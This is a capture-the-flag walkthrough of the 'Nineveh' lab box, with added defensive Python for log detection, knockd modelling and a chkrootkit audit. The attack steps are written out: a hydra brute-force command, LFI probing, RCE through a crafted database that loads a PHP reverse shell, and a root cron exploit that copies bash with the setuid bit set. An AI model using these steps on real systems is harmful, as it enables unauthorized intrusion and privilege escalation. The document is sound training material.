Nineveh is a medium-difficulty Linux box that is compromised by brute-forcing login credentials. This leads to a page that is vulnerable to local file inclusion (LFI). Credentials for the phpLiteAdmin instance can then be brute-forced as well, after which you can create a new database containing malicious PHP code that gets executed when it is included through the LFI. A private key is found inside one of the images; combined with a port knock, it gives a lower-privileged SSH shell. A cron job indicates that chkrootkit is in use, and a public exploit for it gives a root shell.
Nmap discovered the following open ports and services:
nmap -sC -sV -oN fullscan -Pn 10.129.94.12

PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
The user is presented with the following:
Gobuster found the following locations:
http://10.129.94.12/department/login.php
https://10.129.94.36/db
https://10.129.94.36/secure_notes/
The first page was vulnerable to username enumeration:
It also shows this comment in the response:
@admin! MySQL is been installed.. please fix the login page! ~amrois
Since you know the username you can brute-force the password. In this case hydra was used as it is relatively easy to configure and it is very fast. The following command was used to brute-force the login form:
In only 1 minute, Hydra managed to find the password:
[http-post-form] host: 10.129.94.12 login: admin password: 1q2w3e4r5t
After authenticating, the following page is shown:
This shows several hints. It also shows the following notes page: http://10.129.94.12/department/manage.php?notes=files/ninevehNotes.txt
This turned out to be vulnerable to local file inclusion (LFI). The following request was issued:
The passwd file was retrieved:
An attempt was made to pull the user flag directly:
However, this gives an error that the filename is too long. Switching back to the other directories from gobuster, the following page was found:
Authenticating with the previously discovered credentials does not work. Searchsploit shows the following available exploits:
However, all of these require authentication. Therefore, hydra was used again with the following command:
hydra -P /usr/share/wordlists/rockyou.txt 10.129.94.12 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password."
Hydra found it again:
Let's go back to the following exploit from searchsploit to get RCE as an authenticated user:
A database was created with the name ninevehNotes.txt.rce.php. The first part of that name has to be in the DB name, otherwise the LFI keeps returning the "file name too long" error. Also note that you can't use single quotes in the PHP code, because they break the SQL statement. In this case the PHP fetches a file named shell.txt, which contains a PHP reverse shell.
Then go to:
This will land you a reverse shell.
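As an added example (not part of the original post), the following Python script shows what the two web-side attacks above look like to a defender reading the Apache access log: it flags a burst of POSTs to /department/login.php from one source, the pattern hydra leaves behind, and any manage.php request whose notes= value is not the one expected file. The log lines and the 10.10.14.x addresses are constructed for the demo.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed Apache access-log lines (not traffic captured from the box), modelled on the
# attacks above: a hydra-style POST burst on login.php followed by notes= LFI probes.
SAMPLE_LOG = """\
10.10.14.5 - - [08/Feb/2021:15:20:01 +0100] "POST /department/login.php HTTP/1.1" 200 1546
10.10.14.5 - - [08/Feb/2021:15:20:01 +0100] "POST /department/login.php HTTP/1.1" 200 1546
10.10.14.5 - - [08/Feb/2021:15:20:02 +0100] "POST /department/login.php HTTP/1.1" 200 1546
10.10.14.5 - - [08/Feb/2021:15:20:03 +0100] "POST /department/login.php HTTP/1.1" 302 0
10.10.14.5 - - [08/Feb/2021:15:21:10 +0100] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 2210
10.10.14.5 - - [08/Feb/2021:15:21:30 +0100] "GET /department/manage.php?notes=files/ninevehNotes.txt/../../../../etc/passwd HTTP/1.1" 200 3890
10.10.14.5 - - [08/Feb/2021:15:22:05 +0100] "GET /department/manage.php?notes=../ninevehNotes.txt.rce.php HTTP/1.1" 200 118
10.10.14.9 - - [08/Feb/2021:15:22:40 +0100] "POST /department/login.php HTTP/1.1" 302 0
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
LOGIN_PATH = "/department/login.php"
NOTES_PATH = "/department/manage.php"
ALLOWED_NOTES = {"files/ninevehNotes.txt"}     # the only value manage.php legitimately receives

def parse(line):
    m = LOG_RE.match(line)                     # (ip, timestamp, method, target, status) or None
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, target, int(status)

def login_bursts(lines, threshold=4, window=60):
    """{ip: peak count} for sources sending >= threshold POSTs to login.php within window seconds."""
    posts = {}
    for ip, when, method, target, _ in filter(None, map(parse, lines)):
        if method == "POST" and urlsplit(target).path == LOGIN_PATH:
            posts.setdefault(ip, []).append(when)
    hits = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):            # sliding window over sorted timestamps
            while (t - times[start]).total_seconds() > window:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = max(hits.get(ip, 0), end - start + 1)
    return hits

def lfi_attempts(lines):
    """(ip, notes value) for every manage.php request whose notes= is not on the allow-list."""
    urls = [(ip, urlsplit(t)) for ip, _, _, t, _ in filter(None, map(parse, lines))]
    return [(ip, v) for ip, u in urls if u.path == NOTES_PATH
            for v in parse_qs(u.query).get("notes", []) if v not in ALLOWED_NOTES]
```

An allow-list on the server side (only ever including files/ninevehNotes.txt) would have removed the LFI entirely; the log check is the compensating detection when the application cannot be fixed right away.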
Linpeas found a mail:
www-data@nineveh:/tmp$ cat /var/mail/amrois
From firstname.lastname@example.org Fri Jun 23 14:04:19 2017
Return-Path: email@example.com
X-Original-To: amrois
Delivered-To: email@example.com
Received: by nineveh.htb (Postfix, from userid 1000)
        id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
To: firstname.lastname@example.org
From: email@example.com
Subject: Another Important note!
Message-Id: <20170623190419.D289B2E3587@nineveh.htb>
Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT)

Amrois! please knock the door next time! 571 290 911
Note that the text gives an indication of a port knocking possibility. Check the config with:
www-data@nineveh:/home/amrois$ cat /etc/knockd.conf
[options]
        logfile = /var/log/knockd.log
        interface = ens160

[openSSH]
        sequence = 571, 290, 911
        seq_timeout = 5
        start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
        tcpflags = syn

[closeSSH]
        sequence = 911,290,571
        seq_timeout = 5
        start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
        tcpflags = syn
To open port 22 you can execute the following command:
knock 10.129.94.36 571, 290, 911
When you re-run Nmap you will see that it opened it:
nmap -p22 10.129.94.36
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 15:31 CET
Nmap scan report for 10.129.94.36
Host is up (0.011s latency).

PORT   STATE SERVICE
22/tcp open  ssh
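Added example, not from the original post: a small Python model of the knockd rules above, useful for seeing why the knock is a thin layer of obscurity rather than authentication (the sequence sits in cleartext in a mail and in a world-readable config, and the close sequence is simply the reverse). The matching rules (unrelated ports ignored, a wrong port resets the door, the timeout counted from the first knock) are assumptions written for this demo, not knockd's source.

```python
# Rules transcribed from the /etc/knockd.conf shown above. The matching logic is a
# simplified model written for this walkthrough, not knockd's own code.
OPEN_SEQ = (571, 290, 911)
CLOSE_SEQ = (911, 290, 571)
SEQ_TIMEOUT = 5.0                   # seconds, from seq_timeout = 5
KNOCK_PORTS = set(OPEN_SEQ) | set(CLOSE_SEQ)

def replay_knocks(syn_events):
    """Replay (src_ip, epoch_seconds, dst_port) SYN events and return the
    (src_ip, door) actions that would fire, in order.
    Assumptions: SYNs to ports outside both sequences are ignored, a wrong knock
    port resets that door's attempt, and an attempt expires once more than
    SEQ_TIMEOUT seconds have passed since its first knock."""
    actions = []
    progress = {}                   # (ip, door) -> (next index in seq, time of first knock)
    for ip, when, dport in sorted(syn_events, key=lambda e: e[1]):
        if dport not in KNOCK_PORTS:
            continue
        for door, seq in (("openSSH", OPEN_SEQ), ("closeSSH", CLOSE_SEQ)):
            idx, started = progress.get((ip, door), (0, None))
            if started is not None and when - started > SEQ_TIMEOUT:
                idx, started = 0, None                 # too slow: start over
            if dport == seq[idx]:
                idx, started = idx + 1, (when if started is None else started)
                if idx == len(seq):                    # full sequence: start_command fires
                    actions.append((ip, door))
                    idx, started = 0, None
            else:
                idx, started = 0, None                 # wrong port: reset this door
            progress[(ip, door)] = (idx, started)
    return actions

def demo():
    """Same three knocks from one source, once inside and once outside the 5 s window."""
    fast = [("10.10.14.5", 1000.0, 571), ("10.10.14.5", 1001.0, 290), ("10.10.14.5", 1002.0, 911)]
    slow = [("10.10.14.5", 1000.0, 571), ("10.10.14.5", 1003.0, 290), ("10.10.14.5", 1007.0, 911)]
    return replay_knocks(fast), replay_knocks(slow)
```

Feeding it SYN timestamps from a firewall log (or /var/log/knockd.log, which the config above enables) shows exactly which sources opened port 22 and when.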
However, when using SSH to authenticate, you are prompted for a password. It took a while to figure this out but go back to the notes from gobuster. The only page that was not checked so far is:
You can go to this directory locally:
www-data@nineveh:/home/amrois$ locate secure_notes
/var/www/ssl/secure_notes
/var/www/ssl/secure_notes/index.html
/var/www/ssl/secure_notes/nineveh.png
Then run strings on all those files; you will find a private key in the .png one. Copy it to a file on your local host and authenticate over SSH with:
ssh -i nineveh-privatekey firstname.lastname@example.org
This gives you a lower privileged shell and you can cat user.txt.
Run linpeas again, it will find the following:
Let's check that file:
amrois@nineveh:~$ strings /usr/sbin/report-reset.sh
#!/bin/bash
rm -rf /report/*.txt
Let’s check that directory:
amrois@nineveh:/report$ ls -la
total 24
drwxr-xr-x  2 amrois amrois 4096 Feb  8 08:41 .
drwxr-xr-x 24 root   root   4096 Jan 29 03:34 ..
-rw-r--r--  1 amrois amrois 4838 Feb  8 08:40 report-21-02-08:08:40.txt
-rw-r--r--  1 amrois amrois 4838 Feb  8 08:41 report-21-02-08:08:41.txt
[...]
When you throw some of the content into Google you will find a lot of information about chkrootkit. Searchsploit has the following modules for this:
Chkrootkit 0.49 - Local Privilege Escalation | linux/local/33899.txt
You can create a file named update and make sure it’s executable. I used the following contents:
#!/bin/bash
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash
When the cron job runs, it creates the file rootbash, after which you can execute it to get a root shell:
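Added example, not from the original post: a Python audit helper for the chkrootkit weakness used above, written for the defender who has to find this condition before an attacker does. It compares the version against the 0.50 fix, inspects the update file that a vulnerable chkrootkit executes as root, and lists cron entries that invoke chkrootkit. The crontab text is constructed; the box's real cron entries are not shown in the writeup.

```python
import os
import stat
import tempfile

FIXED_IN = (0, 50)      # the /tmp/update bug (EDB-ID 33899 above) was fixed in chkrootkit 0.50

def version_is_vulnerable(version):
    """True for a chkrootkit version string such as '0.49' that is older than the 0.50 fix."""
    return tuple(int(p) for p in version.strip().split(".")) < FIXED_IN

def update_hook_status(tmp_dir="/tmp"):
    """Describe <tmp_dir>/update, the file a vulnerable chkrootkit executes as root."""
    path = os.path.join(tmp_dir, "update")
    if not os.path.exists(path):
        return {"path": path, "exists": False}
    st = os.stat(path)
    return {"path": path, "exists": True,
            "executable": bool(st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)),
            "owner_uid": st.st_uid, "mode": stat.filemode(st.st_mode)}

def cron_runs_chkrootkit(crontab_text):
    """Uncommented crontab/cron.d lines that invoke chkrootkit (the job the attack relies on)."""
    return [line for line in crontab_text.splitlines()
            if "chkrootkit" in line and not line.lstrip().startswith("#")]

def demo():
    """Plant a harmless executable named update in a scratch directory and audit it."""
    with tempfile.TemporaryDirectory() as scratch:
        path = os.path.join(scratch, "update")
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\necho audit-test\n")   # placeholder, not the payload from the box
        os.chmod(path, 0o755)
        return update_hook_status(scratch)

# Constructed sample; the exact cron entries on the box are not shown in the writeup.
SAMPLE_CRON = """\
# m h dom mon dow user command
*/1 * * * * root /usr/sbin/chkrootkit
*/5 * * * * root /usr/sbin/report-reset.sh
"""
```

On a real host, run update_hook_status() against /tmp and feed it the output of `cat /etc/crontab /etc/cron.d/*`; any executable update file next to a root cron job running chkrootkit older than 0.50 is the condition to fix.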
This was a really fun box. Obtaining the private key was rather tricky, but apart from that it was relatively straightforward and I learned a lot from doing it. Hope you enjoyed this walkthrough!